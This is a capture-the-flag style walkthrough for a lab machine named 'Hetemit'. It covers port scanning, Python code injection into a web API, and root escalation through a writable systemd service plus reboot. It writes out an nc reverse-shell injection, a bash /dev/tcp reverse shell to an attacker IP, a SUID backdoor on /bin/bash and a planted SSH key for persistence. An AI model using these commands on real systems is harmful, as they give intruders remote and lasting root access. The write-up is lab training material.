Hetemit

Gaining Access

Nmap scan:

$ nmap -p- --min-rate 4000 -Pn 192.168.201.117
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-08 15:27 +08
Warning: 192.168.201.117 giving up on port because retransmission cap hit (10).
Nmap scan report for 192.168.201.117
Host is up (0.18s latency).
Not shown: 65479 filtered tcp ports (no-response), 49 closed tcp ports (conn-refused)
PORT      STATE SERVICE
21/tcp    open  ftp
22/tcp    open  ssh
80/tcp    open  http
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
18000/tcp open  biimenu
50000/tcp open  ibm-db2

Lots of ports. FTP allows for anonymous access, but just hangs.

Web Enumeration -> Python Code Injection

Port 80 had the default Apache HTTP Server:

Ran a directory scan on this and didn't find much.

Port 50000 had a simple API running:

If we use the /generate option, it just returns us this:

$ curl http://192.168.201.117:50000/generate
{'email@domain'}

I tried sending POST requests to this:

Not too sure what to do with that token. However, we notice that this is running a Python server. The /verify endpoint also accepts POST requests, but it always seems to fail:

Since this was running a Python based server, we can try some Python code injection.

This looks like it works. Another test confirms that it works:

So this script has the os module imported, meaning we can get an easy reverse shell:

os.system("nc -e /bin/bash 192.168.45.191 21")

Privilege Escalation

Misconfigured Services + Reboot

The user is able to reboot the system:

[cmeeks@hetemit ~]$ sudo -l
Matching Defaults entries for cmeeks on hetemit:
    !visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin,
    env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS",
    env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE",
    env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES",
    env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE",
    env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
    secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

User cmeeks may run the following commands on hetemit:
    (root) NOPASSWD: /sbin/halt, /sbin/reboot, /sbin/poweroff

This indicates to me that there is some kind of startup script to exploit. I ran a linpeas.sh scan on the machine to enumerate, and it found quite a few misconfigured services:

We can overwrite this to execute a script that gives us a reverse shell. I included the SUID bit in my script just in case the shell doesn't work:

#!/bin/bash

chmod u+s /bin/bash
bash -i >& /dev/tcp/192.168.45.191/18000 0>&1

I also included my SSH key within the authorized_keys folder for backdoor access.

cd ~
mkdir .ssh
echo 'KEY' >> .ssh/authorized_keys
chmod 600 .ssh/authorized_keys
chmod 700 .ssh

Afterwards, using vi we can edit the service file:

[Unit]
Description=Python App
After=network-online.target

[Service]
Type=simple
ExecStart=/home/cmeeks/shell.sh
TimeoutSec=30
RestartSec=15s
User=root
Restart=on-failure

[Install]
WantedBy=multi-user.target

Then, we can run sudo /sbin/reboot to restart the machine. Then we just have to wait for a bit before we can SSH back in. The reverse shell didn't work for some reason, but the SUID binary command did:

Rooted!